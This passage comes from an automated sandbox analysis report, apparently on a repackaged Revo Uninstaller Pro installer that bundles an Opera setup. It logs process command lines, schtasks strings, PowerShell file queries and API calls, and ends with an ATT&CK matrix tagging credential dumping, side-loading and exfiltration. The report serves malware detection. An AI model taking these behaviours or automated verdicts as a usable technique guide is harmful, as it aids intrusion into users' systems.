--server-tracking-blob="mwzknge2yjnhytyzyjqxnze2ymzkztm0yzhlotrjytq1odnlogy3odrmyzmynmq3zdrjmgy4zjk2mzm2ndewodp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijp7im5hbwuioijvcgvyysj9lcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwic3lzdgvtijp7inbsyxrmb3jtijp7imfyy2gioij4odzfnjqilcjvchn5cyi6ildpbmrvd3milcjvchn5cy12zxjzaw9uijoimtailcjwywnrywdlijoirvhfin19lcj0aw1lc3rhbxaioiixnzmznzyymzk4lje0mjgilcj1c2vyywdlbnqioijou0ltx0luzxrjichnb3ppbgxhksisinv0bsi6eyjjyw1wywlnbii6inixmcisim1lzgl1bsi6imfwyiisinnvdxjjzsi6ikrxtkxtvcj9lcj1dwlkijoinwu5y2qwzdqtytq2my00mze3ltk1odqtntzkmja3zjrlytc0in0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0c06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BSYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndHunter TopHunter RightHunter LeftShell_TrayWndHunter Window AOTHunter Window SizeHunter ModeHunter Bottom\Microsoft\Internet Explorer\Quick LaunchStart HunterHunter TransparencySDSysPagerToolbarWindow32SHELLDLL_DefViewSysListView3275%50%25%ReBarWindow32 /tn "Revo Uninstaller Pro Hunter Mode" /create /XML " /hunter\Explorer.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F schtasks.exe6.1Windows 7,8,VistaWindows XPWindows XP,Vista,7,8Windows 86.25.1Windows 7Windows Vista6.0Windows 8.16.310.110.05.2 %D %sUDMFT%06d%sUDTMP%sEVREM%06d %S %M %H %Tc%02ld
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndHunter RightHunter TopShell_TrayWndHunter LeftHunter Window SizeHunter Window AOTHunter BottomHunter ModeStart Hunter\Microsoft\Internet Explorer\Quick LaunchSDHunter TransparencyToolbarWindow32SysPagerSysListView32SHELLDLL_DefView50%75%ReBarWindow3225%/create /XML /tn "Revo Uninstaller Pro Hunter Mode" \Explorer.exe" /hunterschtasks.exe/Delete /TN "Revo Uninstaller Pro Hunter Mode" /F
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSLISTVIEW32SHELLDLL_DefViewSysListView32Program ManagerProgman`
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE34B cpuid 16_2_002FE34B
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: GetLocaleInfoW,GetNumberFormatW,16_2_002F9D99
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\runonce.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation BiasJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FCBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,16_2_002FCBB8
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping11
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts12
        Command and Scripting Interpreter
        1
        Component Object Model Hijacking
        1
        Component Object Model Hijacking
        2
        Obfuscated Files or Information
        LSASS Memory4
        File and Directory Discovery
        Remote Desktop Protocol1
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        21
        Windows Service
        1
        Access Token Manipulation
        1
        Software Packing
        Security Account Manager56
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive11
        Encrypted Channel
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCron21
        Registry Run Keys / Startup Folder
        21
